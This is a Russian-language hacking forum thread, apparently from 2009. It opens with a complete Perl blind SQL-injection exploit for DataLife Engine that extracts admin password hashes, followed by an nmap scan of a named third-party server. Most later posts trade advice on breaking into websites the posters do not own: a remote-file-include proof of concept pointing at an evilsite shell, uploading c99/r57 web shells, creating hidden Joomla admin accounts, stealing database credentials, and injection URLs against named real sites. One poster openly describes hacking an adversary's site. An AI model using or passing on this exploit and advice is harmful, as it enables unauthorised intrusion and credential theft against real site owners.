Сплой:


#!/usr/bin/perl

## DataLife Engine sql injection exploit by RST/GHC
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
## 18.06.06

use LWP::UserAgent;
use Getopt::Std;

getopts('u:n:p:');

$url = $opt_u;
$name = $opt_n;
$prefix = $opt_p || 'dle_';

if(!$url || !$name) { &usage; }

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] URL : $url\r\n";
print " [~] USERNAME : $name\r\n";
print " [~] PREFIX : $prefix\r\n";
$userid = 0;
print " [~] GET USERID FOR USER \"$name\" ...";
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name);
if($res->as_string =~ /do=lastcomments&userid=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=pm&doaction=newpm&user=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=feedback&user=(\d*)/) { $userid = $1; }
if($userid != 0 ) { print " [ DONE ]\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }
print " [~] USERID : $userid\r\n";

print " [~] SEARCHING PASSWORD ... ";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b [ DONE ]
---------------------------------------------------------------
USERNAME : $name
USERID : $userid
PASSHASH : $allchar
---------------------------------------------------------------
};
}
else
{
print "\b[ FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
print "\b".chr($char)." ";
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name.'%2527 and ascii(substring((SELECT password FROM '.$prefix.'users WHERE user_id='.$userid.'),'.$s_num.',1))'.$ccheck.'/*');
if($res->as_string =~ /$name<\/td>/) { return 1; }
else { return 0; }
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b/"; }
if($status==1){ print "\b-"; }
if($status==2){ print "\b\\"; }
if($status==3){ print "\b|"; }
}

sub usage()
{
&head;
print q(
USAGE:
r57datalife.pl [OPTIONS]

OPTIONS:
-u <URL> - path to index.php
-n <USERNAME> - username for bruteforce
-p [prefix] - database prefix

E.G.
r57datalife.pl -u http://server/index.php -n admin
---------------------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
---------------------------------------------------------------
DataLife Engine sql injection exploit by RST/GHC
---------------------------------------------------------------
);
}


Инфо по серверу:

Interesting ports on utel23.in.ua (213.186.116.12):

Not shown: 982 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.0a

25/tcp open smtp Exim smtpd 4.67

| SMTPcommands: EHLO utel23.in.ua Hello plausible-infringer.volia.net [77.123.192.113], SIZE 31457280, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, 250 HELP


|_ HELP Commands supported:, , AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP

53/tcp open domain ISC BIND 9.5.0-P1

80/tcp open http Apache httpd 1.3.39 ((Unix) mod_ssl/2.8.30 OpenSSL/0.9.8b mod_perl/1.29 FrontPage/5.0.2.2510)

|_ HTML title: \xD4\xE0\xED- \xD1\xE0\xE9\xF2 - TechnoS DarkSwords Official Dealer- \xD2\xE5\xF5\xED\xEE\xF1 \xCE\xF4\xE8\xF6\xE8\xE0\xEB...

110/tcp open pop3 Dovecot DirectAdmin pop3d

|_ POP3 Capabilites: USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN)

111/tcp open rpcbind

| rpcinfo:


| 100000 2 111/udp rpcbind


| 100024 1 725/udp status


| 100000 2 111/tcp rpcbind


|_ 100024 1 728/tcp status

135/tcp filtered msrpc

139/tcp filtered netbios-ssn

143/tcp open imap Dovecot DirectAdmin imapd

443/tcp open ssl/http Apache httpd 1.3.39 ((Unix) mod_ssl/2.8.30 OpenSSL/0.9.8b mod_perl/1.29 FrontPage/5.0.2.2510)

|_ SSLv2: server still supports SSLv2

|_ HTML title: Secured Home of dealer.com.ua

445/tcp filtered microsoft-ds

587/tcp open smtp Exim smtpd 4.67

| SMTPcommands: EHLO utel23.in.ua Hello plausible-infringer.volia.net [77.123.192.113], SIZE 31457280, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, 250 HELP


|_ HELP Commands supported:, , AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP

593/tcp filtered http-rpc-epmap

765/tcp open ssh OpenSSH 4.3 (protocol 2.0)

993/tcp open ssl/imap Dovecot DirectAdmin imapd

|_ SSLv2: server still supports SSLv2

995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d

|_ SSLv2: server still supports SSLv2

2222/tcp open http DirectAdmin httpd 1.32.2 (Registered to Besthosting.com.ua)

|_ HTML title: DirectAdmin Login

|_ robots.txt: is empty or has no disallowed entries

3306/tcp open mysql MySQL 5.0.41-community-log

| MySQL Server Information: Protocol: 10


| Version: 5.0.41-community-log


| Thread ID: 7664891


| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection


| Status: Autocommit


|_ Salt: $RU17^Sf(1[Z0!Tam#_6

Device type: general purpose

Running: Linux 2.6.X

OS details: Linux 2.6.9 - 2.6.20

Uptime guess: 37.282 days (since Tue Dec 23 04:08:42 2008)

Network Distance: 6 hops

TCP Sequence Prediction: Difficulty=198 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Unix

Заранее благодарен

f3d
31.01.2009, 04:18
Доброго времени суток. есть проблема.
Имеется сайт на движке irokez(на локальной машине). Нашел к нему на милворме php-инклуд. вот что там написано:

Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";

+ Proof Of Concept:

http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?


Я составил ссылку
http://irokez/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evil/shell.php?command=ipconfig

шелл не сработал... Выдал
Warning: main(gallery.func.php) [function.main]: failed to open stream: No such file or directory in Z:\home\irokez\www\scripts\gallery.scr.php on line 11

Fatal error: main() [function.require]: Failed opening required 'gallery.func.php' (include_path='.;/usr/local/php/PEAR') in Z:\home\irokez\www\scripts\gallery.scr.php on line 11


Что я делаю не так?

iSee
31.01.2009, 12:57
register_globals = on или off? для удачной эксплуатации нужно что бы был в on

Jokester
31.01.2009, 13:00
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен

Это условия , при которых должно работать

Проверь всё это

iSee
31.01.2009, 13:05
Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!
нет. нельзя

f3d
31.01.2009, 16:56
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен

Это условия , при которых должно работать

Проверь всё это

Это я проверил в первую очередь. все условия выполнены... Шелл точно есть... ini верно... баг не пофикшен т.к качал ту версию которая указана на милворме...

Мне просто интересно, может это у них ошибка.. и этот способ не работает, а они пабликуют не проверенную инфу...

Xeo
01.02.2009, 18:08
Подскажите пожалуйста. Дело в том что есть один сайт. И на нем происходит чтото на подобе активации акаунта. Т.е. ты долженн ввести свой логин и пароль там в форму.
Все зашибись работает. Случайно наткнулся на такую вещь. Если повторно активировать аккаунт то MySQL выдает ошибку с логином пасом и мылом...
Database Error (44): Ошибка SQL: Duplicate entry 'Мой логин' for key 2 - INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс') [ SYSPATH/classes/database/driver/mysql.php, line 347 ]

Source
SYSPATH/classes/database/driver/mysql.php, line 94
Mysql_Result->__construct(FALSE, Resource id #54, TRUE, 'INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 256 Database_Driver_Mysql_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 870 Database_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/orm.php, line 638 Database_Core->insert('users', array ('email' => 'Мое мыло', 'username' => 'Мой логин', 'password' => 'Мой пасс'))
APPPATH/classes/controller/activate.php, line 48 ORM_Core->save() Controller_Activate->index(FALSE)
SYSPATH/classes/kohana.php, line 335 ReflectionMethod->invokeArgs(object Controller_Activate { template => object View { kohana_filename => *PROTECTED*, kohana_filetype => *PROTECTED*, kohana_local_data => *PROTECTED*, kohana_global_data => *PROTECTED* }, corners => *PROTECTED*, styles => *PROTECTED*, cp_links => *PROTECTED*, auto_render => TRUE, input => object Input { use_xss_clean => *PROTECTED*, magic_quotes_gpc => *PROTECTED*, ip_address => , instance => *PROTECTED* } }, array ('id' => FALSE)) Kohana::instance()
SYSPATH/classes/event.php, line 205 call_user_func(array ('Kohana', 'instance'), )
SYSPATH/bootstrap.php, line 65 Event::run('system.execute') DOCROOT/index.php, line 92 require 'SYSPATH/bootstrap.php'
Подскажите возможноли с помощью этой зацепки выудить с сайта бд пользователей? Если да, то подскажите что делать. Весь день читаю различные статьи и ничего покачто не получяается

Platon
01.02.2009, 18:13
iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?

ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?

Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо

Alex-xxx
07.02.2009, 15:59
Я знаю что у хостинга на котором я взломал сайт логин и пароль от фтп и пхпмайадмин одинаковый, у меня есть админка сайта недруга вот мне и нужно из этой админки как нибудь выдрать данные для входа в пхпмайадмин, таким образом я получу доступ и к ftp их сайта! Подскажите как достать этот логин и пароли из админки??? Если нужен шелл... то подскажите какой!
Буду очень благодарен тому кто ответит!

LOOX
08.02.2009, 02:19
Стукни 316996655

omel
10.02.2009, 03:27
Как витянуть пароли с jos_users если есть SQL-Inj в c om_fire boa rd:
http:// whi teg uard-cl an .ру/component/option,com_fireboa rd/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/ ???
Делал так 20union%20select%20passwor d%20from%20jos_users но нет никакого результата

Nicca
12.02.2009, 15:25
Подскажите как решить проблему JoomFish + Joomla 1.5.6
Такая проблема:
Есть 2 версии русская(по умолчанию) и ангийская. В админке(конфигурация) включил пункты:
"Включить дружеские урлы(для ПС) и использовать Apache mod_rewrite
В русской версии сайт работает нормально. В английской же работает только главная, на остальных же грузится 404 ошибка. Почему так?
Если же отключить дружеские урлы(для ПС) и Apache mod_rewrite то работает нормально

it's mу
13.02.2009, 08:30
iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?

ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?

Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо
Залей шелл - у тебя будет доступ к контролю над файлами.
Заходи как админ в админ панель - будет доступ к управлению контентом
Что тебе еще нужно? ты же вроде уже имеешь доступ в администраторскую панель

Nicca
13.02.2009, 12:00
Как убрать меню которое показывает где я сейчас нахожусь, например:
Главная--Раздел--Подраздел
В админке вижу такую опцию для раздела:
При нажатии открыть в:
-В этом же окне с панель навигации
-Новое окно с навигацией
-Новое окно без навигации

Мне получается нужно "В этом же окне без панели навигации"
Получается что надо лезть в код?
Как удалить это меню из шаблона(где оно вызывается)

Rebit
13.02.2009, 12:09
Да меню нада удалять из кода а у папки нада удалять документ зависимости от шаблона ! Там модуль удалить нада если я не ошибаюсь !

it's mу
13.02.2009, 12:13
Да меню нада удалять из кода а у папки нада удалять документ зависимости от шаблона ! Там модуль удалить нада если я не ошибаюсь !
ты ошибся :/

ТС, в темплейте удали mosPathWay и всё :)

Nicca
13.02.2009, 12:14
А какой именно?

it's mу
13.02.2009, 12:18
блин :/ короче зайди сюда:
joomla/templates/[название твоего темплейта]/
найди там index.php
Там найди <?php mosPathWay(); ?> и сотри.

Nicca
13.02.2009, 12:19
У меня джумла 1.5.6.
Где єту пеерменную искать? В файле templates/index.php

it's mу
13.02.2009, 12:21
попробуй

Nicca
13.02.2009, 12:21
блин :/ короче зайди сюда:
joomla/templates/[название твоего темплейта]/
найди там index.php
Там найди <?php mosPathWay(); ?> и сотри.

У меня все записи в темплейте такого типа:
<jdoc:include type="modules" name="user1" style="xhtml" />

it's mу
13.02.2009, 12:37
тогда удали это:
<div id="pathway">
<jdoc:include type="modules" name="breadcrumb" />
</div>

Nicca
13.02.2009, 16:59
Захожу в статью для редактирования. Адрес в урле такой:
administrator/index.php?option=com_content&sectionid=-1&task=edit&cid[]=65

Хочу отредактировать кнопки для загрузки картинки, вставки анонса, и т.д.(которіе находятся по текст ареа)
В каком файле єто все лежит??

попугай
13.02.2009, 17:28
Залей шелл и посмотри конфиг подключения к базе данных - там логин и пароль

Маркиза
13.02.2009, 23:29
Скажите плиз имея доступ на фтп можно ли залезть на движок ?

Alfer
14.02.2009, 08:56
А что это правда,что использование конструктора сайта использовать более безопасней,чем любой движок cms?

it's mу
14.02.2009, 09:42
Скажите плиз имея доступ на фтп можно ли залезть на движок ?
да, если фтп виден из веб

it's mу
14.02.2009, 09:43
А что это правда,что использование конструктора сайта использовать более безопасней,чем любой движок cms?
если конструировать будешь на html то безопасно, только есть другие угрозы как ПО или РеверсАЙПИ :(

Alfer
14.02.2009, 10:01
А вообще,что бы вы посоветовали с той т.з,оправдаются ли мои труды вложенные на конструктор ради безопасности или оно того не стоит?

it's mу
14.02.2009, 10:20
А вообще,что бы вы посоветовали с той т.з,оправдаются ли мои труды вложенные на конструктор ради безопасности или оно того не стоит?
оно того не стоит... ставь джомлу и крути как хочешь, джумла достаточно безопасный движок, единственное перед тем как ставишь какой-либо компонент, проверь его на багтреке на уязвимость.

Alfer
14.02.2009, 10:43
оно того не стоит... ставь джомлу и крути как хочешь, джумла достаточно безопасный движок, единственное перед тем как ставишь какой-либо компонент, проверь его на багтреке на уязвимость.
Спасибо

Platon
15.02.2009, 13:41
Маркиза - идешь на фтп, потом сливаешь файл конфига - берешь от туда данные для доступа mysql - идешь в mysql - и создаешь нового админа - или берешь хэш старого админа - все ручками - потом идешь в админку и логинишься.

Как то так )

it's mу
16.02.2009, 07:26
берешь хэш старого админа
прежде чем его взять и логиниться, его нужно расшифровать

Platon
17.02.2009, 23:25
it's mу - ну это уже тонкости )) Можно его поменять на хеш уже известного пароля, а потом после "настройки" движка под себя - вернуть обратно.. Вариантов масса - даже без расшифровки ))

F1nder
18.02.2009, 17:55
вопрос:
как подконнектица к БД MySql зная:
- все данные для доступа
- сайт на дедике
- система FreeBSD 6.1

-m0rgan-
18.02.2009, 18:05
Попробуй с помощью этого скрипта:
<?php
$dbLink = mysql_connect("IP_database", "login", "password")
or die ("oops");
?>

F1nder
18.02.2009, 18:34
Попробуй с помощью этого скрипта:
<?php
$dbLink = mysql_connect("IP_database", "login", "password")
or die ("oops");
?>
не катит 'oops'

F1nder
18.02.2009, 18:37
$dbLink = mysql_connect("localhost", "login", "password")
только так

-m0rgan-
18.02.2009, 18:43
подключается?

F1nder
18.02.2009, 18:46
да

-m0rgan-
18.02.2009, 18:50
ну вот)

основной скрипт - это $dbLink = mysql_connect("IP_database", "login", "password") а or die ("oops"); это уже дополнительно...

F1nder
18.02.2009, 18:54
суть в том что при вводе
IP_database= ip servera - коннекта нет
IP_database= 'localhost' - коннект есть

следовательно нужно искать папку phpmyadmin :(


ps скрипт выполняю на серваке

-m0rgan-
18.02.2009, 19:08
суть в том что при вводе
IP_database= ip servera - коннекта нет
IP_database= 'localhost' - коннект есть
Ну так и должно быть!
В принципе можно вписывать и хост БД.
А хост можно узнать черех ф-ю database()

F1nder
18.02.2009, 19:17
Ну так и должно быть!
В принципе можно вписывать и хост БД.
А хост можно узнать черех ф-ю database()
извиняйте в этом всем я пока нооб :)
еще раз и по порядку:
-прочитал все данные cms для подключения к БД (хост там и есть "localhost" , вроде)

мне нужно подконнектица к БД через интерфейс phpmyadmin желательно удаленно, но удаленно я так понял не пускает
есть ли еще варианты?

ps спс. за терпение :)

-m0rgan-
18.02.2009, 19:29
ты уверен,что там стоит пхп май админ?

it's mу
19.02.2009, 05:00
извиняйте в этом всем я пока нооб :)
еще раз и по порядку:
-прочитал все данные cms для подключения к БД (хост там и есть "localhost" , вроде)

мне нужно подконнектица к БД через интерфейс phpmyadmin желательно удаленно, но удаленно я так понял не пускает
есть ли еще варианты?

ps спс. за терпение :)
я так понял если ты прочитал сорцы CMS и получил данные для подключения к БД значит у тебя есть доступ к интерфейсу администратора или же доступ FTP? если так, тогда попробуй просто залить какой-нибудь c99shell и собственно через него подключится к БД. А на счет phpmyadmin, его попросту может и не быть, так как это свободнораспространяемое ПО и альтернатив ему куча :) удаленно тебе подключится вряд ли получится так как на большинства серверах удаленное подключение к БД запрещено по умолчанию.

Jokester
19.02.2009, 14:08
ps скрипт выполняю на серваке
Тоесть доступ есть.Ты можешь лить свои скрипты и тебе нужна работа с базой? Заливай любой дампер вбивай данные подключения и наслаждайся.

Как вариант гугл : "RST MySQL"

F1nder
19.02.2009, 19:55
Тоесть доступ есть.Ты можешь лить свои скрипты и тебе нужна работа с базой? Заливай любой дампер вбивай данные подключения и наслаждайся.

Как вариант гугл : "RST MySQL"
доступ у меня только к админке
попробую залить шелл r57sql
всем спс. за помощь

budden
19.02.2009, 22:05
Кто-нибудь знает, можно ли, имея досутп к БД, подправить какую-нибудь запись XSS-ом, чтобы на главной странице (или лучше в админке) она срабатывала?

WP_
19.02.2009, 22:28
это с бд никак не связанно, это баги в обработке js !

budden
19.02.2009, 23:01
это с бд никак не связанно, это баги в обработке js !
Я прекрасно знаю, что такое XXS - joomla включает в главную страницу записи из БД - если там (в БД) будет XSS то она окажется на главной странице. Дошло?

Ericon2009
20.02.2009, 02:10
при наличии работающей скуль инъекции в джумле можно ли ее как нибудь использовать для залива шелла или добавления пользователя с админскими правами?

-m0rgan-
20.02.2009, 03:40
Если есть права, то можно попробовать залить шелл через INTO OUT FILE.
Или получить пассы админки, установить модуль Joomla Explorer и через него залить шелл...

M4g
20.02.2009, 15:38
при наличии работающей скуль инъекции в джумле можно ли ее как нибудь использовать для залива шелла или добавления пользователя с админскими правами?
посмотри на примере других сплойтов для жомлы) вытягивается хеш, расшифровывается и юзается уже пароль админа)

всем привет как ломануть этот сайт htt://xaker.1xw.ru срочно надо
в просьбы о взломах)

Ericon2009
21.02.2009, 01:32
посмотри на примере других сплойтов для жомлы) вытягивается хеш, расшифровывается и юзается уже пароль админа)


вот вытянуть то вытянул пока расшифровать не удается - поэтому и мысли в другую сторону, как бы побыстрее сделать тем более, что там хеши с салтом

faza02
21.02.2009, 08:48
Ericon2009, посмотри, работает ли там file_priv.
на 80% уверен что нет, но попробовать стоит.

Ericon2009
22.02.2009, 02:34
Ericon2009, посмотри, работает ли там file_priv.
на 80% уверен что нет, но попробовать стоит.
ага спасиб попробую

такой вопрос еще немного ламерский кто нибудь юзал сканер rpvs ? антивир на него сильно ругается и пишет почему то что там троян, а не хактул как обычно на утилиты и сканеры разные

it's mу
22.02.2009, 10:04
ага спасиб попробую

такой вопрос еще немного ламерский кто нибудь юзал сканер rpvs ? антивир на него сильно ругается и пишет почему то что там троян, а не хактул как обычно на утилиты и сканеры разные
там троян приклеен к сканеру

Ericon2009
23.02.2009, 03:41
там троян приклеен к сканеру

спасибо .. так и подумал .. а он где нибудь прописывается или только при запуске активируется?

it's mу
23.02.2009, 12:25
зависит от трояна, а тебе не кажется что данный разговор, своей тематикой, выходит за рамки этой темы. так что если тебя беспокоит целостность твоей системы и ты хочешь узнать что-за троян и где он находится, в таком случае предлагаю тебе посетить данный раздел форума: https://forum.antichat.ru/forum80.html

budden
25.02.2009, 12:27
Кто-нибудь может подсказать, каким образом шифруется пароль в поле passwd таблицы nuke_popsettings в php-nuke?

Например: %E3%2FO%84%9BU

Shadow6120
25.02.2009, 17:10
Как можно протроянить сайт на ucoz? оч надо

kutskovasja
26.02.2009, 17:11
Есть сайт на joomla, есть пароль к админской панели. Нет логина. Логин admin не подходит. Помогите узнать логин.
Набор плагинов в движке поидее стандартный. Мот кто знает какую-нибудь sql инъекцию. Подскажите. очень надо.
для примера http://centurytechnologiesuk.org/ я знаю здесь пароль админа. как узнать логин.

faza02
26.02.2009, 17:21
смотри в теме с уязвимостями жумлы.

-m0rgan-
26.02.2009, 18:17
Как можно протроянить сайт на ucoz? оч надо

в паблике способов нету...
было только пара пасивок и все...

Они в первую очередь сформировали все силы на защиту своего двига...

kutskovasja
27.02.2009, 02:39
смотри в теме с уязвимостями жумлы.

Смотрел. Там все sql для различных дополнительных плагинов.
А если доп. плагинов не стоит?
Мот через какие стандартные плагины или в темплейтах стандартных есть баг.
Подскажите, кто что знает. :)

Вот два сайта для примера
http://centurytechnologiesuk.org/
http://www.albuquerquepressclub.org/

кто-нибудь сможет узнать логин админа. Если да, то подскажите как.

Zulf
27.02.2009, 08:17
http://wow-moonlight.com/
Подскажите плиз что там за двиг стоит :). Не одной директории найти не могу :(
Не дле?

DimOnOID
27.02.2009, 10:05
http://wow-moonlight.com/
Подскажите плиз что там за двиг стоит :). Не одной директории найти не могу :(
Не дле?

http://wow-moonlight.com/?news=80+and+substring(version(),1,1)=5&page=0
Это самопис наверное.
phpinfo
http://wow-moonlight.com/inc/phpinfo.php
information_schema.tables
и mysql.users Доступны.действуй.
http://wow-moonlight.com/phpmyadmin/

Shadow6120
27.02.2009, 20:47
Ты меня не так понял, я сказал протроянить, а не взломать, вот статья про протроянивание пхпбб и ипб http://forum.antichat.ru/thread23612-Ipb.html
Как сделать что-то подобное с укозом?

F1nder
02.03.2009, 18:25
Что имеем:
-2 хеша паролей админов МД5 (которые нигде не подбираются и не находятся)
-уязвимость sql inject
-куки проверяются усложненным методом (учитывается ip и user agent)
вот функция:
function isValid() {
global $db;

$mintime = (time()-$this->expiretime);
$db->query("DELETE FROM ".$db->prefix("session")." WHERE time<$mintime");

$sql = "
SELECT
u.uid,
u.uname,
u.pass,
s.hash
FROM ".$db->prefix("session")." s
INNER JOIN ".$db->prefix("users")." u ON u.uid=s.uid
WHERE s.hash='".$this->sessionID."'";

if ( !$result = $db->query($sql) ) {
return false;
}

list($uid, $uname, $pass, $hash) = $db->fetch_row($result);
if ( !empty($uid) ) {
if ($this->sessionID == md5($uid.':'.$pass.':'._HTTP_USER_AGENT.':'._REMOT E_ADDR)) {
$this->uid = $uid;
$this->uname = $uname;
$this->pass = $pass;
$this->hash = $hash;
return true;
}
}

return false;
}

какие будут предложения?
и возможно ли с помощью sql inject редактировать БД ?

oRb
03.03.2009, 11:12
и возможно ли с помощью sql inject редактировать БД ?
в MySql нет.
какие будут предложения?
Если есть возможность покажи как устанавливается значение константы _REMOTE_ADDR.
В некоторых движках попадался примерно такой код:
if (@getenv("HTTP_CLIENT_IP")) {
define('_REMOTE_ADDR', getenv("HTTP_CLIENT_IP"));
} else if (@getenv("HTTP_X_FORWARDED_FOR")) {
define('_REMOTE_ADDR', getenv('HTTP_X_FORWARDED_FOR'));
} else if (@getenv('REMOTE_ADDR')) {
define('_REMOTE_ADDR', getenv('REMOTE_ADDR'));
} else if (isset($_SERVER['REMOTE_ADDR'])) {
define('_REMOTE_ADDR', $_SERVER['REMOTE_ADDR']);
} else {
define('_REMOTE_ADDR', "Unknown");
}
Тогда подменить _REMOTE_ADDR вполне возможно

F1nder
03.03.2009, 17:56
по-моему этот участок отвечает за присвоение констант
// SERVER followed by ENV comparison :: apache/iis, cgi/isapi :: ..so check'em all :)
!empty($_SERVER['HTTP_HOST']) ? define('_HTTP_HOST' , $_SERVER['HTTP_HOST']) : define('_HTTP_HOST' , $_ENV['HTTP_HOST']);
!empty($_SERVER['QUERY_STRING']) ? define('_QUERY_STRING' , $_SERVER['QUERY_STRING']) : define('_QUERY_STRING' , $_ENV['QUERY_STRING']);
!empty($_SERVER['SCRIPT_NAME']) ? define('_SCRIPT_NAME' , $_SERVER['SCRIPT_NAME']) : define('_SCRIPT_NAME' , $_ENV['SCRIPT_NAME']);
!empty($_SERVER['HTTP_REFERER']) ? define('_HTTP_REFERER' , $_SERVER['HTTP_REFERER']) : define('_HTTP_REFERER' , $_ENV['HTTP_REFERER']);
!empty($_SERVER['REQUEST_METHOD']) ? define('_REQUEST_METHOD' , $_SERVER['REQUEST_METHOD']) : define('_REQUEST_METHOD' , $_ENV['REQUEST_METHOD']);
!empty($_SERVER['HTTP_USER_AGENT']) ? define('_HTTP_USER_AGENT', $_SERVER['HTTP_USER_AGENT']) : define('_HTTP_USER_AGENT', $_ENV['HTTP_USER_AGENT']);

$R_URI = !empty($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : $_ENV['REQUEST_URI'];
!empty($R_URI) ? define('_REQUEST_URI', $R_URI) : define('_REQUEST_URI', _PHP_SELF.'?'._QUERY_STRING);
// Ordered by priority ..let's fetch that buggers IP
$tmp_ip[1] = $_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_ENV['HTTP_X_FORWARDED_FOR'];
$tmp_ip[2] = $_SERVER['HTTP_CLIENT_IP'] ? $_SERVER['HTTP_CLIENT_IP'] : $_ENV['HTTP_CLIENT_IP'];
$tmp_ip[3] = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : $_ENV['REMOTE_ADDR'];

Black.Cat
03.03.2009, 18:34
Подскажите пожалуйста хороший готовый движок магазина.. Чтоб понадежнее, пофункциональнее и не дорого (или бесплатно)..

ValentinV
03.03.2009, 20:42
Уважаемые, будьте добры подскажите насколько будет сложным перенести набитый под завязку сайт с БД с ucoz.ru на другой сервер?
многие пишут что это практически не реально.
что думаете вы?

-m0rgan-
03.03.2009, 21:04
ValentinV, сложновато...там есть возможность сделать бекап даных или всего пректа, но онов каком то карявом виде=/
если разберешся с ним, то дерзай)

Black.Cat, имхо phpshop, в нем вроде как залатали наболевшие баги...

ValentinV
03.03.2009, 21:56
ValentinV, сложновато...там есть возможность сделать бекап даных или всего пректа, но онов каком то карявом виде=/
если разберешся с ним, то дерзай)...
есть "полный" бекап из админки движка, но как я понял он не сделал дамп самой БД.
как полностью слить сайт оттуда с базой... я уже незнаю...
очень необходимо переехать

Black.Cat
03.03.2009, 22:46
А vamshop как?.. Слаб?

kutskovasja
07.03.2009, 03:41
Вопрос такой. Есть доступ к админке в joomla 1.5.0 Не могу залить шелл. пробовал через медиа менеджер. не получается выдает ошибку:
JFTP::store: Bad response
WARNFS_ERR02
Error. Unable to upload file
Пробовал через шаблоны. т.е. менял код шаблона. выдает ошибку:
JFTP::write: Bad response
Operation Failed!: failed to open file %s for writing.

Подскажите как залить шел? что за ошибки? и как можно их исправить?

Alfer
08.03.2009, 13:43
Подскажите, а какую лучше цмску использовать, которая более стабильна и безопасна: джумла, туро, дрюпал?Или еще какая-нибудь?

Zulf
08.03.2009, 13:48
Подскажите что тут за цмс http://wow.wtgames.ru/ ???
Заранее спс ;) С меня +

-m0rgan-
08.03.2009, 14:48
Самопис скорее всего...

Zulf
08.03.2009, 15:11
А можно что-нить поконкретней что там еще есть :)

Seshh
08.03.2009, 16:51
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????

#Wolf#
08.03.2009, 17:23
так и заноси. токо закодируй строку

FarIZ
17.03.2009, 19:04
у меня такой вопрос, может и не в тему.

где могут находятся админские скрипты, т.е. наибольшая вероятность того что они именно там .

иными словами, как стандартный путь обычно выглядит .

я нашел инклуд-баг в скрипте, и могу подключить любой файл (в меру доступности)
только не знаю что подключать .

со своего сайта cкрипт выполнить не получится потому как include(/определ_путь/$параметр_blabla.php)

подскажите если можно

3y6ek
18.03.2009, 10:15
Доброе утро. Вопрос следующий. Есть дырявый сайт, есть залитый мною шелл, можно ли каким то образом сменить владельца файла чтобы я мог его не просто читать, но и редактировать? Или еще лучше скажите где можно посмотреть логин и пароль для ФТП, есть доступ на чтение в папку etc. стоит фриБСД 6*какаято стабл версион.
Спасибо!

dimanqweasdzxc
22.03.2009, 17:37
Добрый день!!
Что такое сплоит и как им пользоваться???
Дай пожалуйста ссыль и подробное описание...
Сплоит нужен для хака движка трекера(TBDEV)...

Заранеее благодарен...

edichka
22.03.2009, 19:13
На стартовой страничке есть форма для поиска

Статьи :

Запускаем сплоиты (http://forum.antichat.ru/thread26510.html)

Tbdev (http://forum.antichat.ru/thread79705-tbdev.html)

